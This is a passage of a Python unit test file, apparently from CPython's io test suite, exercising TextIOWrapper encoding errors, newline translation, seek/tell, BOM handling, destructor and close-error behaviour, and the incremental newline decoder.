b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
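# In other words, these rows encode the universal-newlines rules: None
# translates \n, \r and \r\n to \n; '' keeps line endings untouched; and a
# specific newline string only splits (without translating) on that exact
# terminator.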
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(support.TESTFN, "wb") as f:
f.write(line*2)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(support.TESTFN, "wb") as f:
f.write(data)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
# Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check that the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
# TextIOWrapper will not read the full string, because
# we truncate it to a multiple of the native int size
# so that we can construct a more complex memoryview.
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
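# Note: tobytes() on the memoryview returned here round-trips the bytes that
# were kept, i.e. buf[:idx], which is what test_read_byteslike compares
# against via _to_memoryview(r.getvalue()).tobytes().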
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "RuntimeError: could not find io module state"
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with support.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
# shutdown_error = "LookupError: unknown encoding: ascii"
shutdown_error = "TypeError: 'NoneType' object is not iterable"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
with support.check_warnings(('', DeprecationWarning)):
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
